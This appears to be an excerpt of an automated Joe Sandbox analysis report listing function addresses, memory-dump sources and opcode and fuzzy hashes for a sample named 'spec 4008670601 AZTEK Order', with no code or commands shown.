                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a1196dad2aa46e8144d7a9a7bc2cf82e262eeb4ee47bea4c1604a058926d8c7d
                                                      • Instruction ID: 3f1e1a35733c18ab4b483043ec73ccc482a82168fb58c75609fadfe6d8a29c5f
                                                      • Opcode Fuzzy Hash: a1196dad2aa46e8144d7a9a7bc2cf82e262eeb4ee47bea4c1604a058926d8c7d
                                                      • Instruction Fuzzy Hash: AA115C36380A11BFD36659989CC4F27BA99DBD4B74F504229BF08CB281DB70DD008796
                                                      Function 01820946 Relevance: .1, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7997263e3c2392f80933070bfba970d32d44c4261598425adeaa481e3fb3dc18
                                                      • Instruction ID: 0924343abb96f985c46ba5bf48877c3759afe74fc596101afc524fc73cfc05da
                                                      • Opcode Fuzzy Hash: 7997263e3c2392f80933070bfba970d32d44c4261598425adeaa481e3fb3dc18
                                                      • Instruction Fuzzy Hash: 3021F8B1E40219ABCB20DFAAD8849AEFBF8BF98700F10012EE405E7344D6709A45CB50
                                                      Function 018380A8 Relevance: .1, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                      • Instruction ID: ff8d70cd646917cf6ee1185738f36bef9aa65b75f2d9fb5fa91b014927f00e1b
                                                      • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                      • Instruction Fuzzy Hash: 7F218C72A0020AEFDF129F98CC44BAEBBB9EF89310F244819F910E7251D774DA509B90
                                                      Function 017D0124 Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                      • Instruction ID: d992f811f32bb983c7f5ee8c6cb4a2d109a4167cb2e645ea79b87a998cabbf5b
                                                      • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                      • Instruction Fuzzy Hash: 6B11E273600609AFE7229F54CC45F9EFBB8EB84754F100029F6018B190D672ED44CB64
                                                      Function 017A8770 Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 58b770ea2dc71fbecaf7d26692060e699379a28c50fcc30b86cb58643650cc02
                                                      • Instruction ID: 5a1c265ffd25aa779b5c734ac5cdc5a53b01f6367edb5793570bfc85b81d5e71
                                                      • Opcode Fuzzy Hash: 58b770ea2dc71fbecaf7d26692060e699379a28c50fcc30b86cb58643650cc02
                                                      • Instruction Fuzzy Hash: 67119032701615DB9B11CF9DC4C0A16FFE9AFCA711B98416AEE089F204D6B2D9118791
                                                      Function 017DAAEE Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                      • Instruction ID: 0fb1524017bcf1c4bb1fecaee70bb5ef9db69bfa598361b54ad54413840bab91
                                                      • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                      • Instruction Fuzzy Hash: A9217972600649DFDB218F49C544A66FBF6FB94B10F14887DE58A8BA54C770ED02CB80
                                                      Function 017A80E9 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9169da2b786d96ba240a814bee562e8e2c29275e5f9c8ce0f5c6b088c385403
                                                      • Instruction ID: 4fb73aba76d46881805537ac3f25cf009ff28373f4eecc795164f883cc7f2bb5
                                                      • Opcode Fuzzy Hash: f9169da2b786d96ba240a814bee562e8e2c29275e5f9c8ce0f5c6b088c385403
                                                      • Instruction Fuzzy Hash: F9214C75A00205DFCB15CF58C581AAAFBB6FB88315F6442ADD105AB311D771AD06CB91
                                                      Function 017D674D Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25aa0951a4f9bd1ed696340aa30a2b16cdf011858b9cddfccf982191392153d4
                                                      • Instruction ID: 5696aa924f7416a3db8325fffd797b4804f32f4a34fcdb6d4f3c052845fe1f93
                                                      • Opcode Fuzzy Hash: 25aa0951a4f9bd1ed696340aa30a2b16cdf011858b9cddfccf982191392153d4
                                                      • Instruction Fuzzy Hash: D9216A71600A04EFD7218F68C881B66B7F8FF44360F04882DE5AAC7250EB30E940CBA0
                                                      Function 017CE8C0 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6118c4d9eeb15bf07532686454d328363cf8459e6d6758eaadf26db97d4dbd2f
                                                      • Instruction ID: aae7b4e27218d3abae8fb88d651a116adfc8469dad634b6cdee04aaf1deeccd6
                                                      • Opcode Fuzzy Hash: 6118c4d9eeb15bf07532686454d328363cf8459e6d6758eaadf26db97d4dbd2f
                                                      • Instruction Fuzzy Hash: 2D114C333001146FCF1ACB28CC85A6FB656EBD5770B38852CDA22CB280ED309902C291
                                                      Function 01836870 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7aedb95b008ea8853bda72227499be9dc2c784074289fd22726699717438cf45
                                                      • Instruction ID: 6f4ca2958abb3706040e120445e54450ee9641580887091e798d352a8e1751fb
                                                      • Opcode Fuzzy Hash: 7aedb95b008ea8853bda72227499be9dc2c784074289fd22726699717438cf45
                                                      • Instruction Fuzzy Hash: F3119172240518FFD722DB5DC940F9AB7A8EF99B54F254029F605DB251EA70EB01C7E0
                                                      Function 017D66B0 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1efefef3b3fc72acc0d7a189b618e9b36a4095e88b30bbc022b16be4f2257d6
                                                      • Instruction ID: 409dd1cc7159b2c15427f9f127fe6a33f465f6cc5990f0baf712a3ac10790cff
                                                      • Opcode Fuzzy Hash: c1efefef3b3fc72acc0d7a189b618e9b36a4095e88b30bbc022b16be4f2257d6
                                                      • Instruction Fuzzy Hash: CF11EF72A0120DABCB25CF59D480E4AFBF4EF84260B168079E9059B315F734DD00CBA0
                                                      Function 0186A8E4 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                      • Instruction ID: f225f10c1fc7f5f584635039b8f238937ecb2e4c06cec27f1c4c44c84564a435
                                                      • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                      • Instruction Fuzzy Hash: 9711B236A00919AFDB19CB58C805B9DFBB9EF84310F158269EC55E7344E671AE51CB80
                                                      Function 017A0AD0 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                      • Instruction ID: 46f822328066f7db77f847d91c50ef2cf84011ce4c7689e058745a808a8ea766
                                                      • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                      • Instruction Fuzzy Hash: 8A2106B5A00B059FD3A0CF29C580B52BBF4FB48B10F50492EE98AC7B40E371E814CB90
                                                      Function 0182E7E1 Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                      • Instruction ID: 75b0db9464aee5bbcb2bb341bf9762af9a4dda8751ede2e35daa7199bdd5d045
                                                      • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                      • Instruction Fuzzy Hash: FC110631600614EFE7229F48C844B56BBE5EF45754F068428EA88DB160D7B0DEC0D794
                                                      Function 017C27ED Relevance: .1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b5dcfdd39645009fbd8b135db512d53d89fe68bd3e2a74db41eae35d6d9d9780
                                                      • Instruction ID: b4b1cac34dfd26f9cda7d48be380f305c7ac192395a52f39cc581efe9407dd70
                                                      • Opcode Fuzzy Hash: b5dcfdd39645009fbd8b135db512d53d89fe68bd3e2a74db41eae35d6d9d9780
                                                      • Instruction Fuzzy Hash: 8C01D631785649ABE32BA66DDC98F67BBDCEF81B54F0500A9F901CB292DA24DD00C261
                                                      Function 017A4690 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cecfbc0047f59db2a4cee2e03a540ff29cb78a8b6955fd05e339611efc3a3142
                                                      • Instruction ID: 301d3cd5f4c28c3fd3a11f300c2091d0e962781102880c20a05d05abdbebb7db
                                                      • Opcode Fuzzy Hash: cecfbc0047f59db2a4cee2e03a540ff29cb78a8b6955fd05e339611efc3a3142
                                                      • Instruction Fuzzy Hash: 1C11C276200685EFDB26CF5DD844F56BFA8EBC5764F584219F9068B260C3B2E800CF60
                                                      Function 017D6620 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3dcbe65fc6da603f451049c42dca8622ced3cb00d7f63cb102652fbce4921f83
                                                      • Instruction ID: 7a5a9b1cf1493c7cf68c07f2dbc988f609b7e0494bc818614ca7178aa85d079d
                                                      • Opcode Fuzzy Hash: 3dcbe65fc6da603f451049c42dca8622ced3cb00d7f63cb102652fbce4921f83
                                                      • Instruction Fuzzy Hash: 5411C472A00719ABDB22DF99C9C0B5EFBB8FF84750F540459EA01A7244D730EE41CBA0
                                                      Function 017CEA2E Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: afc0cfa68ae391390003ab5cc770bda80652b482e32006e17c5e7a193abded47
                                                      • Instruction ID: cdf9a0e13d13f5be9b909938910a04b860436d6c929404080bc8ad1371b12c00
                                                      • Opcode Fuzzy Hash: afc0cfa68ae391390003ab5cc770bda80652b482e32006e17c5e7a193abded47
                                                      • Instruction Fuzzy Hash: F1019E715001099FC726DF29D448F2AFBF9EB85718F28826EE1058B664DB70EE46CF90
                                                      Function 017CE53E Relevance: .1, Instructions: 55COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                      • Instruction ID: d748d795739755056bc5b29609cd2e5de92c95277ec1fa7a028b3651a61eced3
                                                      • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                      • Instruction Fuzzy Hash: 0A11E9712016C59FE7339B1CDD44B65BB94BB50B48F1904E4DF41C7682F738C981C250
                                                      Function 0182E75D Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                      • Instruction ID: 66fbd43399efcb0971c323fc8a80566ef347a86d612c4cc47257414809355bc6
                                                      • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                      • Instruction Fuzzy Hash: 4C01D232600125AFEB239F58C844FAABBA9EB84754F158024EE05DB260E771DE80C794
                                                      Function 0179A250 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                      • Instruction ID: e9ae5806e92660c0e8d3dae7679b1c6d26ee0eed2ea5e80e8367e46a2516e4fc
                                                      • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                      • Instruction Fuzzy Hash: 4001C47150A7219BCF218F19A840A66BBF5EB9976070085ADF9958B681D731D404CB60
                                                      Function 0181E1D0 Relevance: .1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f83345de4b6a5720d5ca1c586453758a7f5df7ceaae5971c6c24999ea0ca2a5
                                                      • Instruction ID: d54f00ab53f0be932200f0bebd31c4bd7bc305e43204c18306d89b517afc685f
                                                      • Opcode Fuzzy Hash: 4f83345de4b6a5720d5ca1c586453758a7f5df7ceaae5971c6c24999ea0ca2a5
                                                      • Instruction Fuzzy Hash: 4B11CE32241201EFCB16AF09CC94F46BBB8FF58B84F200064FD058B655C235EE00CA90
                                                      Function 017A6259 Relevance: .1, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef2d17eebf466cdb789e3d40cbbd02b50d903ddf22b2979802567477ea02f727
                                                      • Instruction ID: 40f51aa61a998fa7d4dcbc4763f9cb424d5ff1292b6488da7f53d7d9a93cfdaa
                                                      • Opcode Fuzzy Hash: ef2d17eebf466cdb789e3d40cbbd02b50d903ddf22b2979802567477ea02f727
                                                      • Instruction Fuzzy Hash: AF11A071901218ABDF25EB64CC4AFE8B3B8BF48710F5041D4B314A60E0E7709E81CF84
                                                      Function 01826050 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 34d654cd3c9f1eab32791a6be6bc1823040b2f955e35cdbbd408bbe7a4d52b8a
                                                      • Instruction ID: ba2e0d351efe4c0a45b89cd8b99cf5f50459be1fad9f85d41ee435bc33b9350d
                                                      • Opcode Fuzzy Hash: 34d654cd3c9f1eab32791a6be6bc1823040b2f955e35cdbbd408bbe7a4d52b8a
                                                      • Instruction Fuzzy Hash: FB111B7290001DABCB12DB94CC84DDFB7BCEF48354F044166E906E7211EA34AA55CBA0
                                                      Function 017A208A Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                      • Instruction ID: 6ffbd38436536c96a569adc83c4aa23a0e23423a2c71e912e57d069905390b34
                                                      • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                      • Instruction Fuzzy Hash: 2B01F1332001108BEF218A6DD880B93F76BBFC4700F9546A9EE018F24BEA71C881C3A0
                                                      Function 01836500 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3dfb25c93a28be97d8a1466b02ff5bee9fdcc05769142836ecb60a8d896cf763
                                                      • Instruction ID: cc6401d5d234f9c9e9b7042c90b577b6af8641a0869853aac7db9a8625fab750
                                                      • Opcode Fuzzy Hash: 3dfb25c93a28be97d8a1466b02ff5bee9fdcc05769142836ecb60a8d896cf763
                                                      • Instruction Fuzzy Hash: F3118272644145AFD711CF5CD440BA5B7B5BB9A314F1C8169F844CB355E731EA41CBA0
                                                      Function 0182C810 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ff32cdf9b16454df6db3bf65875e550a5e656ca9229f3d7513c61a0249034d14
                                                      • Instruction ID: 109e076d0ef34df29dfae76506c700a9532263efe718a9c650d945243edcedc1
                                                      • Opcode Fuzzy Hash: ff32cdf9b16454df6db3bf65875e550a5e656ca9229f3d7513c61a0249034d14
                                                      • Instruction Fuzzy Hash: 07111CB1A00219AFCB00DF99D585AAEBBF4FF58350F10806AE905E7355D674EA418BA4
                                                      Function 0184EA60 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4335aed579438948e089a0afc326aad72fd5d434ab748b229e9ac06d3c71692
                                                      • Instruction ID: 691f6b282dec4a91d2f79433d6b47df04e67fc5d27044bf3a8b2149b49d6ef4d
                                                      • Opcode Fuzzy Hash: b4335aed579438948e089a0afc326aad72fd5d434ab748b229e9ac06d3c71692
                                                      • Instruction Fuzzy Hash: 1E01F5311411159FCB32EE258484E6ABBA9FF61750B14446AE6458B241CF34AD41CB90
                                                      Function 0179C020 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                      • Instruction ID: 3bbe10a6790d95adca1320efab94d9d31ae2471d6cb79447ffba31bcdea67490
                                                      • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                      • Instruction Fuzzy Hash: 2801F5321007459FEF3396AED804EA7F7E9FFC5210F14481DA6568B640EA70E445C760
                                                      Function 017E20F0 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74dcbf8307f5a05fb58037c5d5f54d9445a579ca060d352666586e6070bc0c90
                                                      • Instruction ID: edf6c09b676dfeadf48571259d0bd4089893377b969a0ce381ca8fc3abb2ea0d
                                                      • Opcode Fuzzy Hash: 74dcbf8307f5a05fb58037c5d5f54d9445a579ca060d352666586e6070bc0c90
                                                      • Instruction Fuzzy Hash: CB116D75A0124DAFCB05EFA4C858FAEBBF9EB48740F004099E902D7254E635EE51CB90
                                                      Function 017DE5CF Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b6441d039d8e45f283782b50d948a5b89b4d0e2ceb92c0996c1bf8c14808eb94
                                                      • Instruction ID: 60ea626863b9f816ddcd9b638f678e4fa9d5a8d8dd2a192956340300aca9cb7a
                                                      • Opcode Fuzzy Hash: b6441d039d8e45f283782b50d948a5b89b4d0e2ceb92c0996c1bf8c14808eb94
                                                      • Instruction Fuzzy Hash: 6001B172201901BBC311AB69CDC8E93FBACFF557A47100529B205C7555DB24EC01C6A0
                                                      Function 018369C0 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c4efe7215fe32dbd60fe7318c8f83fa1d48dae48082d1290b18b840b50371362
                                                      • Instruction ID: bc99a73d49842577504a0e1f88eba721469f3e6d6aa8bec9b04ab970ac10a1f5
                                                      • Opcode Fuzzy Hash: c4efe7215fe32dbd60fe7318c8f83fa1d48dae48082d1290b18b840b50371362
                                                      • Instruction Fuzzy Hash: 8001D832214206ABC320DF6DD888DA6FBE8EF98764F254529E959C7180E7309B12C7D1
                                                      Function 0182C460 Relevance: .0, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
